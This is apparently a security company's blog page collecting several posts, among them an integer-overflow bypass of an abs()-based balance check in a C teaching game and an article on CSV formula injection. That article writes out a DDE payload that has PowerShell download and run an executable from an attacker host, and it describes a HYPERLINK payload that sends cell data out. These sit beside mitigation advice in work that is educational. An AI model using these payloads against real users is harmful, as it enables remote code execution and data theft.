keep-calm-and-start-debugging-8[1]

How to edit Char Sequence objects in net beans

In Net beans 8, during debugging (in my case, smali debugging), you cannot change char sequence variables, they are shown as read-only strings. An example of usage is Android text-elements (EditText) whose value is stored in Obj.mText.mText in a char sequence. The following screenshot, shows a Tree view, but you cannot change the field in table view either.

netbeans1
So, I tried do the same with Net beans 6.8 and I found that it let me edit char-sequence variables. After some research I figured out that in order to enable editing of those variables I need to disable the auto formatting. You do this in tools menu -> options and remove the V of Default Char sequence formatter:

netbeans2

Now it will not show the string, but an array of Chars that is editable:

netbeans3

Now we can edit, but we can still not see it as a string… I cannot accept shit like that..

So I’ve created a new formatter which shows it nicely, but also allows editing:

netbeans4

Using this formatter, you can see it as a string (view only), but also edit the chars:

netbeans5

 

Good luck

Israel

 

abs-hack me

Negative Subtracting – Bypass the Protection

Introduction to negative subtracting
We all know about the negative subtracting issue. For example, if I transfer money to you, it is reduced from my account and added to your account. The code looks something like:

Myaccount.value = myaccount.value – transfer.amount
Youraccount.value = youraccount.value + transfer.amount

Now, what happens if I transfer a negative value to your account? We know that subtracting two negatives give a positive, so if I transfer minus one hundred to you, my account will increase by one hundred and your account will be reduced by one hundred.

Another example is an online roulette game. The house always wins eventually, because the chances are against the player. But we can turn it simply by betting a negative value. Now, each time we lose, we lose a negative value which means that we actually win…

Up until here it is clear and simple and I hope that everyone knows it.

 

Example of (in)secure code
I recently came across a code that looked secure at first impression, but only upon second glance I understood that it is not secure at all. Let me start by showing you the code (C language), I modified it to become like a hacme game…:

#include <stdio.h>
#include <stdlib.h>

int main()
{
                int inited_balance = 1000;
                int balance = inited_balance;
                int transfer;

                while (1)
                {
                                printf(“You current balance is %d\n”, balance);
                                printf(“\nHow much do you want to transfer? “);
                                scanf(“%d”, &transfer);
                                balance = balance – (abs(transfer));

                                if (balance > inited_balance)
                                {
                                                printf(“\n\nYou found the secret of life, to give is to receive!\n\n\n”);
                                }
                }

                return 0;
}

The protection is based on the abs function, abs stands for absolute. It changes the number from a negative value to the same value but positive. For example, 50 stays 50, -50 becomes 50.

It looks secured, but it is the hacker’s business to know the extreme things…

Abs function is vulnerable to integer overflow and underflow (of course, C being C, it acts different on different compilers. In this article I used GCC compiler). For example, abs(4294967296) returns 0 because it works with int of 4 bytes, and binary representation of 4294967296 is: [00000001][00000000] [00000000] [00000000] [00000000] and since int is just four bytes, the remaining byte falls and we are left with all the zeros…

 

The beautiful bypass

So, in our little hacme game, in order to beat the house, the easiest way is to go into minus value. If we start with 1000 units, we need to subtract 1001, now our balance is -1. Subtracting minus of MIN_INT value, which is -2147483648 will add it and become the maximum integer positive value.

 

abs_game

 

You can play with the attached game (hacme abs), you might find it fun :)

Enjoy
Israel

Formula injection

About Formula Injection

Almost every website today provides social, financial or informative detail to the internet users. Websites that contain sensitive data about users, such as banks, social networks and online stores, restrict the access to private data by using access-control measures such as authentication, authorization encryption mechanisms and more.
However, hackers are still able to find their way to the “prize” with very clever attacking techniques, as their primary target is usually the sensitive data behind the application.

 

In the following post we will review an unusual injection type, with a great potential to cause some SERIOUS DAMAGE if initiated. Well… how can it be initiated? It depends, primarily on the web application programmers, BUT also on the user himself.

 

Let’s start by saying that every application uses untrusted data.

Since the application is intended to be used by the public – we don’t know whether the user is a legitimate one, or a hacker trying numerous types of attacks in order to hijack user sessions, credentials and/or sensitive data such as credit card numbers.

 

The most common attacks we see (and use) today in the applicative field are Injection-based attacks. Why? Because they are relatively easy to perform and pretty rewarding as well.
Let’s take for example one of the most famous of them; SQL injection – where an attacker can inject his own SQL syntax into existing SQL queries and by doing so, he can access sensitive data, change it or otherwise harm the database or the server it runs on.

 

Injection attacks are deployed on a vast number of technologies and protocols so every injection has unique characteristics, different names and different exploitations.

This post is focused on an injection technique called “Formula Injection” which I will explain in detail below.

Many web applications today provide us with the functionality to export data to a spreadsheet such as .csv or .xls files containing our contact list, recent bank transactions, survey responses and more.

Formula injection affects applications using these features without the proper validation for data input and thereby allowing the attacker to inject cool (but malicious) payloads into the exported files.

The user then opens the file and runs the injected payloads, which lead to command execution and data theft.

 

So how does it happen?

I’m sure that many of you have already seen and used Excel formulas before such as the SUM function to sum-up a group of cells:

formula_cell

In order to execute formulas in Excel, the command has to start with “=” so excel knows it has to perform some kind of function – and the most common functions are the ones that stay inside the boundaries of Excel.
In addition, Microsoft office is using a protocol called DDE (Dynamic Data Exchange).

Formula injection

DDE is an inter-process communication protocol. It sends messages between applications that share data and uses shared memory to exchange data between applications and is also supported also by apache OpenOffice and LibreOffice (!!)

Assuming the victim opened a .CSV file injected with this payload – the first sights would be a very eye-catching security alert like the following:

formula_warning1

As a security measure, Microsoft decided to add a few security alerts before activating automatic update of links… But, I do trust the source of this file because it was exported by me, and from my account.

formula_warning2

The second alert is more suspicious saying that windows need your permission to start CMD.EXE.

 

With that being said, let’s take a look at the following formula:

=cmd|’ /C powershell Invoke-WebRequest “http://attacker-site.com/files/Troj.exe” -OutFile “$env:Temp\poc.exe”; Start-Process “$env:Temp\poc.exe”

 

We can see that one of the cells run a function calls cmd > to open powershell > that downloads a file to %temp% and runs it. What this means is that an attacker can literally hijack the victim’s computer.

Other payloads won’t have to activate CMD in order to cause damage. If we weren’t using DDE, “=HYPERLINK” function is also a good technique to make the victim visit a malicious website or cooler, steal some of the cells’ content by injecting =HYPERLINK function like the following:

formula_exploit1

Note that not only .CSV files are capable of performing such actions, but every type of Excel-supported spreadsheet has this capability.

 

So how can we prevent it?

Although spreadsheet applications perform the action that causes the damage, there is also a lot of responsibility on the user, and especially on the web application, that offers this kind of feature.

The web application needs to perform proper validation of untrusted data provided by the users – and escape these attacks by putting an apostrophe or quote in each cell starting with “=” so the payload ‘=HYPERLINK will be shown to the user as a string and won’t be triggered.

Example:

A malicious hyperlink function that will send the contents of cells A1-50, B1-50 to attacker-site.com while triggered:

formula_mitigation1

Prefixing the cell with an apostrophe or quote will treat the hyperlink function as string:

formula_mitigation2

 

Try it out !

The following file is an injected .CSV file with a payload that downloads a picture of appsec-labs from our site AND Putty.exe from its official site and runs it :

=cmd|’ /C powershell Invoke-WebRequest “https://appsec-labs.com/wp-content/uploads/2014/07/appsec-labs-logo-007.png” -OutFile “$env:Temp\poc.jpg”; Start-Process “$env:Temp\poc.jpg”‘!A0

AND

=cmd|’ /C powershell Invoke-WebRequest “http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe” -OutFile “$env:Temp\putty.exe”; Start-Process “$env:Temp\putty.exe”‘!A0

contacts – injected CSV file

 

 

google-io-weave-700x500

IOT – Compiling Brillo Easily

Google published the first version of Brillo, and as IoT researchers, the first thing that we want to do is to quickly compile and run it in order to get a feel for it, investigate it and learn as much as possible about the system…

 

At the beginning of our work we made some assumptions, which we found to have been correct:

  1. Instead of installing a new environment, it will be easier to install it on our AppUse VM which already has a lot of stuff on it.
  2. Google probably built it similarly to Android (both are Unix-based), so we took the Android compilation guide (links below).

 

Despite these shortcuts, we still came across a lot of trouble… I know for sure that you don’t want to waste your time to find and fix some stupid errors, so let me give you the shortest way to install it in a few steps and one script :)

 

Install Brillo

  1. Download AppUse (links below), unzip it and open it in vmware workstation/vmware player.
  2. This is an important step – in the VM settings, increase the number of the CPUs to 4, otherwise you won’t understand why it doesn’t work, and a workaround will take you a few days minimum. This is a tip coming from sad experience…
  3. Verify that the partition you installed AppUse on has 40 GB free.
  4. Run AppUse, open the terminal, press sudo -I and run the following script (it will take a few hours, be patient):

#install required packages

apt-get update

apt-get install openjdk-7-jdk

apt-get -y -qq install git-core gnupg flex bison gperf build-essential \

zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 \

lib32ncurses5-dev x11proto-core-dev libx11-dev lib32z-dev ccache \

libgl1-mesa-dev libxml2-utils xsltproc unzip

 

#download the source

cd /

mkdir ~/bin

PATH=~/bin:$PATH

curl https://storage.googleapis.com/git-repo-downloads/repo > ~/bin/repo

chmod a+x ~/bin/repo

mkdir brillo

cd brillo

git config –global user.name ‘appuse user’

git config –global user.email ‘[email protected]

git config –global color.ui false

repo init -q -u https://android.googlesource.com/brillo/manifest

repo sync -q

 

#compile it

cd /brillo

source build/envsetup.sh

lunch brilloemulator_x86-eng

make -j4

 

  1. Now it is compiled, you just need to run it, use the following commands:

cd /brillo

export ANDROID_BUILD_TOP=/brillo/

/brillo/out/host/linux-x86/bin/brilloemulator-x86

 

  1. Inside Brillo, if you want to see where you are all the time, use the command:

export PS1=’$(whoami)@$(hostname):$(pwd)> ‘

 

Now it’s your time to explore! :) You can find the weaved service, and adbd service. Adb should run for you as usual and will be detected by AppUse with the adb devices, adb pull/push commands etc.

 

Links

Download AppUse VM – https://appsec-labs.com/appuse/

Android download & compilation guide – http://source.android.com/source/downloading.html

Brillo source – https://android.googlesource.com/brillo/manifest

Avahi service – https://en.wikipedia.org/wiki/Avahi_(software)

 

ssl certificate spoofing

New SSL Vulnerabilities – Spoofing CA Certificates

OpenSSL is a widespread, open-source SSL protocol application and is widespread and used by numerous projects and organization for providing rapid, adaptable and “secure” solution.

OpenSSL has recently reached headlines again, but on a bad note. As of late (the past two years or so), the older and current versions of SSL have suffered from application issues that were considered critical and which lead to the exposure of almost all SSL-based projects (not to be confused with protocol-level issues such as POODLE and BEAST attacks).

Read more

android_dude

Android Application Security Sucks! Here’s what to do about it

Prologue: The following post was written and published by Checkmarx (link) on their website as part of a collaboration between AppSec Labs and Checkmarx. Originally published on May 26th, 2015 by Amit Ashbel.

 

Android…. It is no longer just a mobile phone.

Nowadays Android applications are running anywhere and everywhere. Home Appliances, watches, TVs, car applications and with the Internet of Things kicking in quickly, Android applications will probably become even more prevalent in our lives.

android_dudeAndroid is based on a customized Linux OS version. The main differentiation from the classic PC Linux is that the Android OS was adapted to define every Application on the device as a separate User or entity.

Each Application runs on its own Virtual environment within the  OS called a “Dalvik Machine (DVM)”*. Application code written in Java is modified to Java Byte Code and then converted to DEX (Dalvik byte code). The DVM will generate, on the fly, machine specific instructions to the ARM CPU (or other CPU in use). All Android applications are packaged as an APK (Android Application Package). The APK is a type of archived file which contains everything the android device needs in order to execute the application downloaded via the Google Play store or an alternate source.

*Dalvik is being shifted aside (Android L). Newer Android OS versions are using ART (Android Runtime) however the general idea stays the same.

Read more

Android 5 security updates

Android 5.x Application-Security-related updates

Hi

I just copied and summarized the security-related changed in Android 4.4, 5.0 and 5.1. Enjoy guys!

  

Custom permission

Android 5.0 prevents the installation of apps if they define a custom permission that is already defined by an existing resident app.

 

Web view

The WebView default behavior was changed to block mixed content. Please do not use: setMixedContentMode..

 

SSL default configuration

Android 5.0 introduces changes to the default TLS/SSL configuration used by apps for HTTPS and other TLS/SSL traffic:

  • TLSv1.2 and TLSv1.1 protocols are now enabled
  • AES-GCM (AEAD) cipher suites are now enabled
  • MD5, 3DES, export, and static key ECDH cipher suites are now disabled
  • Forward Secrecy cipher suites (ECDHE and DHE) are preferred

 
Read more